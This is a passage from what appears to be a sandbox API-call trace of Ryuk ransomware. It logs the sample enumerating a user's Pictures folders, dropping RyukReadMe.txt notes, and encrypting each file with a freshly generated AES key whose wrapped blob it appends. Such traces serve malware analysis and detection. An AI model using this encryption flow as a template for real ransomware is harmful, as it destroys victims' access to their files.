(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.718] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.718] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.718] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.718] SetLastError (dwErrCode=0x0) [0157.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.719] GetLastError () returned 0xb7 [0157.719] CloseHandle (hObject=0x184) returned 1 [0157.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0157.719] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.719] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.719] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9ECLhFFCLzUWmp7H8QBg.bmp", dwFileAttributes=0x80) returned 1 [0157.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9ECLhFFCLzUWmp7H8QBg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9eclhffclzuwmp7h8qbg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.720] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=26106) returned 1 [0157.720] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=26106) returned 1 [0157.720] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x64d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.720] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0157.720] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.720] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0157.720] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.721] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.721] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x65fa, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x65fa, lpOverlapped=0x0) returned 1 [0157.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0157.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x65fa, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x6600) returned 1 [0157.722] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.722] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x6600, lpOverlapped=0x0) returned 1 [0157.723] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0157.723] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.723] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.723] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0157.723] CloseHandle (hObject=0x188) returned 1 [0157.738] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.742] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.742] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.742] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.743] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Dekud4K9LZIE5Oo7CZ7f.gif", dwFileAttributes=0x80) returned 1 [0157.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Dekud4K9LZIE5Oo7CZ7f.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dekud4k9lzie5oo7cz7f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.743] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=58866) returned 1 [0157.743] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=58866) returned 1 [0157.743] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xe4d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.743] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0157.744] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.744] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0157.744] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.744] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.744] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe5f2, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xe5f2, lpOverlapped=0x0) returned 1 [0157.745] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0157.745] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xe5f2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xe600) returned 1 [0157.745] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.745] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe600, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xe600, lpOverlapped=0x0) returned 1 [0157.746] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0157.746] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.746] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.746] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0157.746] CloseHandle (hObject=0x188) returned 1 [0157.775] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.779] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.779] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.780] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.780] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.780] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gE8K.bmp", dwFileAttributes=0x80) returned 1 [0157.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gE8K.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ge8k.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.780] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=42906) returned 1 [0157.780] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=42906) returned 1 [0157.780] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa678, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.781] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0157.781] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.781] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0157.781] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.781] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.781] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa79a, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xa79a, lpOverlapped=0x0) returned 1 [0157.782] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0157.782] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xa79a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xa7a0) returned 1 [0157.782] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.782] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xa7a0, lpOverlapped=0x0) returned 1 [0157.783] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0157.783] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.783] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.783] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0157.783] CloseHandle (hObject=0x188) returned 1 [0157.798] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.808] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.808] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.808] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.808] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.808] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IV3ehKc5_Zh6ronHBf6.gif", dwFileAttributes=0x80) returned 1 [0157.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IV3ehKc5_Zh6ronHBf6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iv3ehkc5_zh6ronhbf6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.809] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=31401) returned 1 [0157.809] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=31401) returned 1 [0157.809] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x7987, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.809] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0157.809] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.809] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0157.809] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.810] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.810] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7aa9, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x7aa9, lpOverlapped=0x0) returned 1 [0157.810] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0157.810] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7aa9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7ab0) returned 1 [0157.810] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.810] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7ab0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x7ab0, lpOverlapped=0x0) returned 1 [0157.811] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0157.811] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.811] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.811] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0157.811] CloseHandle (hObject=0x188) returned 1 [0157.826] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.830] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.830] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.830] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.831] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDDBIM-GHQAIqVjqCS.png", dwFileAttributes=0x80) returned 1 [0157.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDDBIM-GHQAIqVjqCS.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kddbim-ghqaiqvjqcs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.831] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=51164) returned 1 [0157.831] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=51164) returned 1 [0157.831] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xc6ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0157.832] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.832] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0157.832] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.832] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.832] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc7dc, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xc7dc, lpOverlapped=0x0) returned 1 [0157.833] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0157.833] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc7dc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc7e0) returned 1 [0157.833] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.833] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc7e0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xc7e0, lpOverlapped=0x0) returned 1 [0157.834] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0157.834] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.834] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0157.834] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0157.834] CloseHandle (hObject=0x188) returned 1 [0157.861] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.865] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.865] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.866] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0157.866] SetLastError (dwErrCode=0x0) [0157.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.866] GetLastError () returned 0xb7 [0157.866] CloseHandle (hObject=0x188) returned 1 [0157.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0157.866] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.866] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.866] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\4YiQ.bmp", dwFileAttributes=0x80) returned 1 [0157.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\4YiQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\4yiq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.867] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=86731) returned 1 [0157.867] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=86731) returned 1 [0157.867] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x151a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.867] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, 